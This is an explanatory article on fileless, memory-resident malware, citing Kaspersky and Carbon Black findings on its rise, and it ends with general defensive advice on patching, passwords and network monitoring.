Traditional anti-malware software works by scanning the files on a computer’s storage drives. If the software finds files that match any of thousands of predetermined signatures, they’re flagged as malware. Attackers get round this by constantly iterating malware in the hope of staying one step ahead of the anti-malware companies, but in the last couple of years a form of malware that never reaches persistent storage has become more popular.
Recently released research from Kaspersky revealed a sharp uptick in the prevalence of malware that’s never committed to persistent storage, or that is largely resident in memory with a small on-disk component hidden within system utilities (rootkits) or the kernel. Fileless malware is particularly pernicious because modern varieties are so hard to find. In the attack detailed by Kaspersky, a bank’s domain controllers were infected with fileless malware which recorded system administration credentials and other data for delivery to the attackers.
According to a report from Carbon Black, in the course of 2016, fileless malware attacks increased from just under three percent of total malware to just over 16 percent. We can reasonably expect to see the number of fileless malware infections increase even more this year. The attacks largely target Windows servers and desktop machines, with the vector being malicious PowerShell scripts picked up on malware sites, or via malvertising and phishing attacks.
Hackers value both persistence and stealth. If they’ve gone to the trouble of infecting a server with malware, they don’t want it to disappear next time the system reboots, and that requires an on-disk component. But persistence is of no benefit if the malware is easily discovered. Malware attacks against enterprise organizations tend to be advanced persistent threats aimed at exfiltrating sensitive data over time.
Fileless malware substantially reduces the risk that the malicious code will be discovered, but does so at the cost of persistence.
Fileless ransomware was rare but not unheard of until relatively recently. The increase in the use of non-persistent attacks can be attributed to the existence of easily available exploit kits and “exploit as a service” platforms that make it straightforward for even unsophisticated hackers to deploy fileless malware attacks.
Because fileless malware is difficult to identify, the most effective way to avoid being affected is to ensure that your servers and other business machines can’t be easily compromised in the first place. Fileless malware is sophisticated, but like all malware, it depends on the existence of software vulnerabilities to exploit systems. Following standard security advice — keeping operating systems and applications up-to-date, using sufficiently complex passwords, and monitoring for signs of malicious network activity — will help reduce the likelihood of a server being compromised and infected.
If your organisation doesn’t posses the expertise to secure its infrastructure, consider investing in managed security services to ensure the infrastructure your organisation relies on is protected.